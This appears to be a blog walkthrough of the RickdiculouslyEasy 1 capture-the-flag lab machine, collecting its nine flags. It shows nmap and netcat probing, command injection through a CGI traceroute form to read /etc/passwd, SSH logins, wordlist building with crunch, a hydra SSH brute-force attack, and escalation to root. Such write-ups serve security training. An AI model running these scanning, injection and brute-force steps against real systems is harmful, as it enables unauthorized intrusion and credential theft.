It's all about digital security.

A simple blog where you can find different things about digital security.

RickdiculouslyEasy 1: CTF walkthrough


Name: RickdiculouslyEasy: 1
Date release: 21 Sep 2017

Author: Luke
Series: RickdiculouslyEasy



We scan our local network to find the IP address of the vulnerable system.


In a second time we use nmap to find all services and open ports.

root@kali:~/Desktop# nmap -A -O -p- -T5 --reason

Starting Nmap 7.60 ( ) at 2017-10-14 17:53 CEST
Warning: giving up on port because retransmission cap hit (2).
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.59% done; ETC: 17:56 (0:00:09 remaining)
Nmap scan report for pc-246.home (
Host is up, received arp-response (0.011s latency).
Not shown: 65455 closed ports, 73 filtered ports
Reason: 65455 resets and 73 no-responses
21/tcp    open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?    syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    syn-ack ttl 64 Cockpit web service
|_http-title: Did not follow redirect to https://pc-246.home:9090/
13337/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at :
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

1   11.19 ms pc-246.home (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 266.46 seconds

FTP service

An FTP service is running and apparently he don’t require credentials.


Note, the pub directory is empty.

First flag: FLAG{Whoa this is unexpected} – 10 Points

10 out of 130.


Cockpit web service

An uncommon port is used for an HTTP service, let’s check this one.


Second flag: FLAG {There is no Zeus, in your face!} – 10 Points

20 out of 130.


Unknown port 13337

We found an open port, let’s try to connect to it.

root@kali:~/Desktop# nc -nvv 13337
(UNKNOWN) [] 13337 (?) open
 sent 0, rcvd 41

No more, no less.

Third flag: FLAG:{TheyFoundMyBackDoorMorty}-10Points

30 out of 130.


Unknown port 60000

A reverse shell publicly accessible? Interesting.

root@kali:~/Desktop# nc -nvv 60000
(UNKNOWN) [] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
# cat FLAG.txt    
FLAG{Flip the pickle Morty!} - 10 Points 

It’s a shell with an highly restrictive environment, only few commands are usable, such as lscat or whoami.

Fourth flag: FLAG{Flip the pickle Morty!} – 10 Points

40 out of 130.


‘Main’ website

Ok, this time we have a true website. In a first time the robots.txt file can give use a really interesting information about the /cgi-bin/ directory, two tools seems to be usable.

root@kali:~/Desktop# curl
They're Robots Morty! It's ok to shoot them! They're just Robots!


In another time, gobuster can be use to find a directory called passwords.

Let’s see what we can find in this directory.

root@kali:~/Desktop# curl
FLAG{Yeah d- just don't do it.} - 10 Points

Moreover, we can find a password hidden in the source code.

root@kali:~/Desktop# curl
<!DOCTYPE html>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->

Fifth flag: FLAG{Yeah d- just don’t do it.} – 10 Points

Our next step is the /cgi-bin directory. The first one, root_shell.cgi, is a lose of time but the second one allow us to use the tracert command via an HTML form.

We can easily find a vulnerability in this tool that will allow us to remotely execute commands on the server.


Let’s enumerate the system and read files.

We will see that the cat command is unusable, fortunately for us, other commands can be use to read the content of a file, such as: less or more. Because less is more, let’s try to read the /etc/passwd file with the less command.

root@kali:/var/www/html# curl ""
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

We have three users.

Let’s try the previously found password with each one.

root@kali:/var/www/html# ssh Summer@ -p 22222
Summer@'s password: 
Last login: Wed Aug 23 19:20:29 2017 from
[Summer@pc-246 ~]$ id
uid=1002(Summer) gid=1002(Summer) groups=1002(Summer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Summer@pc-246 ~]$ ls -lah
total 20K
drwx------. 2 Summer Summer  99 Sep 15 11:49 .
drwxr-xr-x. 5 root   root    52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer   1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc
-rw-rw-r--. 1 Summer Summer  48 Aug 22 02:46 FLAG.txt
[Summer@pc-246 ~]$ cat FLAG.txt
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

[Summer@pc-246 ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points
[Summer@pc-246 ~]$

Sixth flag: FLAG{Get off the high road Summer!} – 10 Points

60 out of 130.


Morty home folder

We are in the system and we have three users, let’s try the home directory of Morty.

[Summer@pc-246 Morty]$ ls -la
total 64
drwxr-xr-x. 2 Morty Morty   131 Sep 15 11:49 .
drwxr-xr-x. 5 root  root     52 Aug 18 18:20 ..
-rw-------. 1 Morty Morty     1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Morty Morty    18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Morty Morty   193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Morty Morty   231 May 30 14:53 .bashrc
-rw-r--r--. 1 root  root    414 Aug 22 03:06
-rw-r--r--. 1 root  root  43145 Aug 22 03:04 Safe_Password.jpg
[Summer@pc-246 Morty]$

We have a password protected zip file and an interesting password stored in a JPG file.

Actually, not really safe or protected.


The password is: Meeseek.

We are now able to unzip the file.

[Summer@pc-246 Morty]$ unzip -d /tmp/
[] journal.txt password: 
  inflating: /tmp/journal.txt        
[Summer@pc-246 Morty]$ more /tmp/journal.txt 
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade pain
t solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was 
a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
[Summer@pc-246 Morty]$

Seventh flag: FLAG: {131333} – 20 Points

80 out of 130.


Rick home folder

The content of the rick’s home folder.

[Summer@pc-246 RickSanchez]$ ls -lahR
total 12K
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 .
drwxr-xr-x. 5 root        root         52 Aug 18 18:20 ..
-rw-r--r--. 1 RickSanchez RickSanchez  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 RickSanchez RickSanchez 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 RickSanchez RickSanchez 231 May 30 14:53 .bashrc
drwxr-xr-x. 2 RickSanchez RickSanchez  18 Sep 21 09:50 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 ThisDoesntContainAnyFlags

total 12K
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21 09:50 .
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21 10:30 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe

total 4.0K
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 ..
-rw-rw-r--. 1 RickSanchez RickSanchez  95 Aug 18 20:26 NotAFlag.txt
[Summer@pc-246 RickSanchez]$

As we can see, we have an ELF binary called safe.

Let’s upload this binary into my Linux.

[Summer@pc-246 RickSanchez]$ exit
Connection to closed.
root@kali:~/Desktop# scp -P22222 Summer@ .
Summer@'s password: 
safe                                                                  100% 8704   845.6KB/s   00:00    

We execute the binary, and apparently we need to use an argument.

root@kali:~/Desktop# ./safe 
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!

Let’s try with the previously found hint.

root@kali:~/Desktop# ./safe 131333
decrypt:     FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.�    @

Now, we have to find the Rick’s password.

Eight flag: FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

100 out of 130.


Rick’s password

One of the best tools installed on Kali Linux for password generation is crunch. This is the tool that I will use for the Rick’s password.
So, we need to have one uppercase, one digit and one word of the old Morty’s band.

  • If like me you didn’t watch the series: you can find the name here:

According to the crunch’s man page, we can choose our the desired pattern, maximum and minimum length.

       Crunch  can  create  a  wordlist based on criteria you specify.  The output from crunch can be
       sent to the screen, file, or to another program.  The required parameters are:

              The minimum length string you want crunch to start at.  This option  is  required  even
              for parameters that won't use the value.

              The  maximum length string you want crunch to end at.  This option is required even for
              parameters that won't use the value.

       charset string


        -t @,%^
              Specifies  a  pattern,  eg:  @@god@@@@  where  the only the @'s, ,'s, %'s, and ^'s will
              @ will insert lower case characters
              , will insert upper case characters
              % will insert numbers
              ^ will insert symbols

We can generate two dictionary, one with the Flesh word and another one with the Curtains word.

root@kali:~/Desktop# crunch 7 7 -t ,%Flesh -o flesh.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@kali:~/Desktop# crunch 10 10 -t ,%Curtains -o curtains.txt
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output

Finally we can use hydra for a dictionary attack on the SSH service.

root@kali:~/Desktop# hydra -l RickSanchez -P merged.txt ssh:// -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2017-10-14 22:40:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 780 login tries (l:1/p:780), ~49 tries per task
[DATA] attacking ssh://
[22222][ssh] host:   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra ( finished at 2017-10-14 22:41:18

Fortunately for us, the merged file (both generated dictionaries) contain only 780 entries and in less than a minut we can find the Rick’s password.


Last Flag

For this last flag, we don’t need a tricky hack or a complex exploit. Always thinking of basics things.

Rick is a super user, so, we only need to make it be a super user with the sudo command.

root@kali:~/Desktop# ssh RickSanchez@ -p 22222
RickSanchez@'s password: 
Last login: Sun Oct 15 07:44:36 2017 from
[RickSanchez@pc-246 ~]$ sudo su
[sudo] password for RickSanchez: 
[root@pc-246 RickSanchez]# 
[root@pc-246 RickSanchez]# more /root/FLAG.txt 
FLAG: {Ionic Defibrillator} - 30 points
[root@pc-246 RickSanchez]#

In few seconds we have a root access to the system and the last flag.

Ninth flag: FLAG: {Ionic Defibrillator} – 30 points